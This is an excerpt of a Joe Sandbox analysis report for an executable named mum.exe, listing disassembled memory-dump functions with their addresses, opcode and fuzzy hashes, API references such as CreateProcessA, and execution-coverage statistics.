Instruction Fuzzy Hash: 8F41D275E04248CBDB18DFAAC9516EEBBF2AF89304F64C12AD418BB265EB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E6C80 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6D5B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0b4d08f8fd9e60efbb5cc65ff1a7899100b3ec28c88f3def20a953da359551c8
Instruction ID: 6b6ad6e922575fc2c78541343921b524e6984ca774f720df4f61b072fc0c7f3c
Opcode Fuzzy Hash: 0b4d08f8fd9e60efbb5cc65ff1a7899100b3ec28c88f3def20a953da359551c8
Instruction Fuzzy Hash: 49410270E042488BEB18DFAAC8456DEFBB2AF98300F60C12AD414BB269DB344945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E08E8 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E09C3

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fd272c2c048d8e471a0e5654baa2b97ac49f70dc4df03a09d2e1aeafa8289349
Instruction ID: 7b3e9c08b7ebfac791ed853037e8261c4e60ef1ddc41e3aa63022eff40925e8d
Opcode Fuzzy Hash: fd272c2c048d8e471a0e5654baa2b97ac49f70dc4df03a09d2e1aeafa8289349
Instruction Fuzzy Hash: AC411370E052488FDB18CFAAC9946DEBBF2AF99300F24D12AD415BB369DB744946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E7E09 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7EE3

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b665be2fb2fbff9606d63e3c9ecbd2769a885d2a6a4f7ae4db594befa526c787
Instruction ID: 4e97eb13ed0583c6a3e8eeab04181146ffa1ef6d41b9ffd8bdb24c6c048634ba
Opcode Fuzzy Hash: b665be2fb2fbff9606d63e3c9ecbd2769a885d2a6a4f7ae4db594befa526c787
Instruction Fuzzy Hash: 56410570E04248CBDB18DFAAC8506EEBBF2AF89304F24C12AD418BB259DB354946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E7102 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E71DC

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c1dd7959d69914a5c7a864b357d4a32f540a019e6578d8bb9cc60583bbc29b30
Instruction ID: 382f86b1a2d429e0c1c40f8faeb7555fffea01b311d58049d7ff5f56466dd185
Opcode Fuzzy Hash: c1dd7959d69914a5c7a864b357d4a32f540a019e6578d8bb9cc60583bbc29b30
Instruction Fuzzy Hash: C5411270E05248CFDB18DFAAC9406AEBBF2AF89300F64D12AD418AB269DB344945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E0490 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E056B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2e15bdbb516e8899ce47dac4e295c064754056bd87655d01033eb2183d3c7cba
Instruction ID: 8496f182c5a8d110995218c507d1a8ae82d8f9714e3b7b9a1e1d6f026a0c81fe
Opcode Fuzzy Hash: 2e15bdbb516e8899ce47dac4e295c064754056bd87655d01033eb2183d3c7cba
Instruction Fuzzy Hash: 30410570E01248CFDB18DFAAC9946DEBBF2AF89304F64C12AD414BB269DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E8B10 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E8BEB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 497a60d40e425275119979764af16ace1e692216fcfe509dd98f9c9d4986ba84
Instruction ID: 5cb7da5a9f282764840a2acfad89df5dae37ee3bd67237012b587a2aaeeca98c
Opcode Fuzzy Hash: 497a60d40e425275119979764af16ace1e692216fcfe509dd98f9c9d4986ba84
Instruction Fuzzy Hash: E5410570E00248CBDB18DFAAC88069EBBB2AF89304F64D12AD418BB765EB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E1A4A Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E1B23

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8d8f959b28c85cf2019eb47de7177ea8d1eb79131f642b64b07718bbdaa6a4b5
Instruction ID: f528c76ec139ee75988406bfda270512d125a341df814bf733cefd92ae8cfedd
Opcode Fuzzy Hash: 8d8f959b28c85cf2019eb47de7177ea8d1eb79131f642b64b07718bbdaa6a4b5
Instruction Fuzzy Hash: C841D670E00248CBEB18DFAAC5516DEBBF2AF98304F64C12AD414BB365DB345A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E1198 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E1273

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 98777e82ffcd9e724b0e9650a0a7f4ac785fbc86f095d63ffacc2e9b73d73993
Instruction ID: 298f01ca686ece936db3355dc1d86db90919ec14044c890ddc8ea3b2dc7c0e72
Opcode Fuzzy Hash: 98777e82ffcd9e724b0e9650a0a7f4ac785fbc86f095d63ffacc2e9b73d73993
Instruction Fuzzy Hash: A041D270E00248CBEB18DFAAC9556DEBBF2AF99300F64C12AD515BB269DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E8F69 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E9043

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c4ab333fd8753ec9e28ac80f5e1d3241faad55e4ee5458a3058440a410efeafa
Instruction ID: c9ffbd4a4b8496361c5516cf4cee2718fc3fb15319f237561d15b11348805600
Opcode Fuzzy Hash: c4ab333fd8753ec9e28ac80f5e1d3241faad55e4ee5458a3058440a410efeafa
Instruction Fuzzy Hash: 4141E270E00248CBEB18DFEAC9546DEBBF2AF89304F64C12AD419BB269DB354945CF44

Uniqueness

Uniqueness Score: -1.00%

Function 002E0D41 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E0E1B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bb9786893589f08d40959d2d532989fddb9b7d0b18744ad8844d5f44d51ffa18
Instruction ID: 360cdca612ac91e402ecaebcc798f7209c675b8bc986e11a0f7977e193dedfca
Opcode Fuzzy Hash: bb9786893589f08d40959d2d532989fddb9b7d0b18744ad8844d5f44d51ffa18
Instruction Fuzzy Hash: 4C410270E05248CBDB18DFEAC9406AEBBF2AF88300F24C02AD419BB369DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E15F1 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E16CB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0639c5b980d3ba7d162f1b318fbc7d32905ff89640457aecb7933761a2e91533
Instruction ID: 503da7f458b6af72011e6ec8ed64bcf023a670dd92f489ddeeee737191783381
Opcode Fuzzy Hash: 0639c5b980d3ba7d162f1b318fbc7d32905ff89640457aecb7933761a2e91533
Instruction Fuzzy Hash: 5041D270E00248CBEB18DFAAC9506EEBBF2AF99304F64D12AD414BB369DB344955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001CBBF8 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(000000FF), ref: 001CBD5A

Memory Dump Source

Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 66bd7df0e6fb57d77ce53dfca433415c29b1ae87f897c0c5d06a13e3cd94f252
Instruction ID: afe3e1b42b00ae59f5d4a537e8ffede5b4e53994945397c2f5848d237ee8bd70
Opcode Fuzzy Hash: 66bd7df0e6fb57d77ce53dfca433415c29b1ae87f897c0c5d06a13e3cd94f252
Instruction Fuzzy Hash: 6C5112B0D04208CBDB18CFEAD884BDDBBB2BF98314F24C529E415AB294D7748845CF14

Uniqueness

Uniqueness Score: -1.00%

Function 001CBD93 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cb7db0106c86e1ff8f207b11390fd9712481ac62cacc496978e42f6921fdbc
Instruction ID: 898ac8889ea4385e8ef49251da093043072f1e9e834e0fd79a16d76003188185
Opcode Fuzzy Hash: 47cb7db0106c86e1ff8f207b11390fd9712481ac62cacc496978e42f6921fdbc
Instruction Fuzzy Hash: 88510DB4D08208CFCB18CFE9D485AECBBB1BF59328F209529E016AB294D7749885CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0016D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1275517770.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_16d000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a074b00f2b69e125673f79e1060705dadabd725b01ff2a2f6a76b9003f5cd5
Instruction ID: 5f107cfa393ffd2fc021bbebf46ba1526070abcfd5832f2a513db4b2fb3e05a4
Opcode Fuzzy Hash: 10a074b00f2b69e125673f79e1060705dadabd725b01ff2a2f6a76b9003f5cd5
Instruction Fuzzy Hash: 4321F275B04244DFCB14DF14E884B26BB65EB88318F34C5A9E9094B246C33BD867CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0016D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1275517770.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_16d000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f440d2235312a3b7560020ffe15f85f923f3fbd722d6160c740e761f3ddd5792
Instruction ID: 52bb3cd601865ccf293042d3a07cda1dba5d8dcf1475fe59e0d4d1d5804cb582
Opcode Fuzzy Hash: f440d2235312a3b7560020ffe15f85f923f3fbd722d6160c740e761f3ddd5792
Instruction Fuzzy Hash: DF216D755093C08FCB12CF24D994B15BF71EB46314F28C5EAD8498B6A7C33AD81ACB62

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 2708, Parent PID: 1732COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	0

Executed Functions

Function 002C2840 Relevance: 4.3, Strings: 3, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 002C2A4A
+, xrefs: 002C2D52
=, xrefs: 002C2ADA

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: 5df1df2d61d079c9339386431863546cf5683790553f5d77df7f30630c0ae89c
Instruction ID: 5f97f7326c045fd543cd07ba39bd1fecdd85d555c40737fc6ad168d96259295f
Opcode Fuzzy Hash: 5df1df2d61d079c9339386431863546cf5683790553f5d77df7f30630c0ae89c
Instruction Fuzzy Hash: E0227E306106148FCB54DF78C491B9EB7A2AF8A304F1585BDD80A9F36ADF359C45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002C1CA2 Relevance: 3.9, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.*=, xrefs: 002C1D5C
, xrefs: 002C1DCE
W, xrefs: 002C1CB4

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: $W$.*=
API String ID: 0-2291536991
Opcode ID: a6efdf31f52a0b2b2ad69e8a06ce052eafae3cf9695929fbc15a993adca5db73
Instruction ID: 2403b15e128c3a0f4b729cb523d2189cff76d9d5c043a32804d099cdda510961
Opcode Fuzzy Hash: a6efdf31f52a0b2b2ad69e8a06ce052eafae3cf9695929fbc15a993adca5db73
Instruction Fuzzy Hash: BC51C035B101158FCB14DB78D881AAEB7B2EFCA315715827AEA05C7756EB30EC61CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002C0911 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 002C093E
(Fl, xrefs: 002C0B65

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: (Fl$48l
API String ID: 0-2888918871
Opcode ID: f86ad1a773914b1d9b54cad82a63d32923a3197bbe6a4b864c6cc8af30658b5d
Instruction ID: bbfa84470eba90ef92110808b7bc2821983ba60324c7d32c4ac598f8e71f07d9
Opcode Fuzzy Hash: f86ad1a773914b1d9b54cad82a63d32923a3197bbe6a4b864c6cc8af30658b5d
Instruction Fuzzy Hash: B3E18F35A10529CFDB14DFB9D884AADB7B2BF88305F11C629E406EB365DB34AD058F90

Uniqueness

Uniqueness Score: -1.00%

Function 002C1990 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

tl, xrefs: 002C1A0D

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: tl
API String ID: 0-379094156
Opcode ID: 323229162344c6652f417eeb40d1423dbf9871d302c52ee7dbd886a45e2f2900
Instruction ID: 95a4e2b84ce6059f78d7dabd4f5f7b6b6a310acf9a4388fa6d3d470358f7026b
Opcode Fuzzy Hash: 323229162344c6652f417eeb40d1423dbf9871d302c52ee7dbd886a45e2f2900
Instruction Fuzzy Hash: 6F817B32B205159FD714DB69D880FAEB3E3AFC8314F1A8169E809DB766DA35DC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002C0588 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

(Fl, xrefs: 002C0701

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: 484136bc7160776fcad97221226217b811c02e73206b67d8354e9dc733c175d6
Instruction ID: b21d70f8c3f2d19e622698a727e5286458da5aec894eee17fef5e35956373958
Opcode Fuzzy Hash: 484136bc7160776fcad97221226217b811c02e73206b67d8354e9dc733c175d6
Instruction Fuzzy Hash: 367108B8D5020EDFDF14CFA9D485AEEBBB1BB48300F20A659D412EB291DB31A951CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002C0577 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(Fl, xrefs: 002C0701

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: cc8e1e1472dc4b662b42fa87da9111193dd1be79c6bcda526d7afb403a52a81d
Instruction ID: f087c8fdd2f36a8cd54d464a8e0c9b5c7a052d7a6354beba45b82ec6fd68c3c3
Opcode Fuzzy Hash: cc8e1e1472dc4b662b42fa87da9111193dd1be79c6bcda526d7afb403a52a81d
Instruction Fuzzy Hash: 00511CB8D4020ADFDF10CFA5D881AEEBBB1BF89300F20A659D411EB251DB359A51CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002C1A31 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f38b40174e35f5b699853e5e7106b22fa96005b6a47bc386f788da66545e93
Instruction ID: 8e5a380484e5fda15a6a8dcbb9a0c6863f86689ce085b2a3ceda440a71aea4f0
Opcode Fuzzy Hash: b7f38b40174e35f5b699853e5e7106b22fa96005b6a47bc386f788da66545e93
Instruction Fuzzy Hash: 06615C32F205259FD714DB69C880F9EB3A3AFC8714F2AC169E8159B766DA34DC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002C3699 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e1c5eca499a16b3c2d69b356b3703581663fffb74212592421cb82cd5a6062
Instruction ID: ae8b860b8bf910af90fedd9154a80ca9a3c3fd9c1c160e307a0b128662d5a785
Opcode Fuzzy Hash: 55e1c5eca499a16b3c2d69b356b3703581663fffb74212592421cb82cd5a6062
Instruction Fuzzy Hash: 5321C971E146489BEB18CFABC80059EFBF7AFC9300F14C13A9418AB259DB705906CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002C2938 Relevance: 4.2, Strings: 3, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 002C2A4A
+, xrefs: 002C2D52
=, xrefs: 002C2ADA

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: d5472e937e50f1c8264a61fb20c5f278a9a59b25ad752b33e8d4083e7f0037ca
Instruction ID: 4dffc19b84049b4d685b29c44f1ba0035b6c89f8d4da3e0333f7edc5d5a40f3e
Opcode Fuzzy Hash: d5472e937e50f1c8264a61fb20c5f278a9a59b25ad752b33e8d4083e7f0037ca
Instruction Fuzzy Hash: 08021C34610604CFCB58EF78C495B9EB7A6AF89304F1185BCD80A9F369DB39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002C0114 Relevance: 4.2, Strings: 3, Instructions: 424
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 002C2A4A
+, xrefs: 002C2D52
=, xrefs: 002C2ADA

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: e53cb47ccbcf216d63ef0165555d2aba9ede89274c02b60a5a83bc3065e2bae3
Instruction ID: ba1fdb7d6d022641081dde563b60edff695cb14a9f014a6d8d7694f0755318fa
Opcode Fuzzy Hash: e53cb47ccbcf216d63ef0165555d2aba9ede89274c02b60a5a83bc3065e2bae3
Instruction Fuzzy Hash: 88021C34610604CFCB58EF78C495B9EB7A6AF89304F1185BCD80A9F369DB39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002C6E30 Relevance: 3.9, Strings: 3, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002C73EB
`!l, xrefs: 002C73FB
,/l, xrefs: 002C7193

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: ,/l$`!l$`!l
API String ID: 0-3429197752
Opcode ID: a320426cd2c3f78ada6022889454db2ebbabf5a2a89a2bbb46554b0e0feddca5
Instruction ID: 296ed1ba517f53edfe91d8ac8aef9f2f7de527f4ce33a01c5af56c4adb219ac9
Opcode Fuzzy Hash: a320426cd2c3f78ada6022889454db2ebbabf5a2a89a2bbb46554b0e0feddca5
Instruction Fuzzy Hash: 2D617E70A28619CBC704CF74C545FBEF7B2EF44305F14865AE556AB292C774E860CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002C2F60 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002C30B0
`!l, xrefs: 002C30A4

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: `!l$`!l
API String ID: 0-3986300676
Opcode ID: d003d826f3ca3904a8cd391fe2cd0a88ecdf80db40fb3bc0f7b20562a5a4ba9d
Instruction ID: 0af91f0f04cbbbef40a777e3b4fb6d001edc9cee974fe6de23d9c7953c98efd0
Opcode Fuzzy Hash: d003d826f3ca3904a8cd391fe2cd0a88ecdf80db40fb3bc0f7b20562a5a4ba9d
Instruction Fuzzy Hash: A241D0347001148FC748EF78C455AAE7BF2EF8A300B2582A9E406DB7B6DE30DC158B91

Uniqueness

Uniqueness Score: -1.00%

Function 002C1750 Relevance: 2.6, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 002C1862
.*=, xrefs: 002C17CF

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: $.*=
API String ID: 0-954985398
Opcode ID: a3759018e1dfe1861cb17157b789fa68822ae3d4d580dc0d89d370e2c71b5e5c
Instruction ID: 8279bb17e4e13ac4cce1dde26994cc2c28efaed34a1e614b55cd4479e6310b81
Opcode Fuzzy Hash: a3759018e1dfe1861cb17157b789fa68822ae3d4d580dc0d89d370e2c71b5e5c
Instruction Fuzzy Hash: D8419B75F1410A8FDB10DFA9E881AAEBBB6FB85311F14862AD514D7706D730EC62CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002C5E48 Relevance: 2.6, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 002C5F8E
48l, xrefs: 002C5E8A

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: b92453e6b805f2a793cc467d00983777328f697ed8b93306270424f062a73c4f
Instruction ID: d616d7b7a0ec7c55f8b5049860545689e4138700a5deb5e801f5baa09a8283f3
Opcode Fuzzy Hash: b92453e6b805f2a793cc467d00983777328f697ed8b93306270424f062a73c4f
Instruction Fuzzy Hash: 3041F330A20A26CFDB148FA8C845F7EB6B5FB45340F64466EE102D7691DB74E9A08B51

Uniqueness

Uniqueness Score: -1.00%

Function 002C6008 Relevance: 2.6, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 002C6251
48l, xrefs: 002C625D

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: ed1f7d8af55c0affeaf03e90f309ab0a9255d014aa1307001e5f3f83c03ece7b
Instruction ID: 18bce1237faf54d71265fbde3bb151cb6f8b08b75f763043b9e898c54766cde1
Opcode Fuzzy Hash: ed1f7d8af55c0affeaf03e90f309ab0a9255d014aa1307001e5f3f83c03ece7b
Instruction Fuzzy Hash: 67419134925616CBC7209FA8CC08BBABBF1FF44306F18826BE429D72A5D3B4D961C711

Uniqueness

Uniqueness Score: -1.00%

Function 00EC7270 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EC7537

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2078b01c2118541fadea4b1190dfd02494a525e6d2c2549f80963ad1fdfef0bb
Instruction ID: b271677be7eed7071441ed428b44efd73d32b8e5da1ce7e5c6db7518d6499e85
Opcode Fuzzy Hash: 2078b01c2118541fadea4b1190dfd02494a525e6d2c2549f80963ad1fdfef0bb
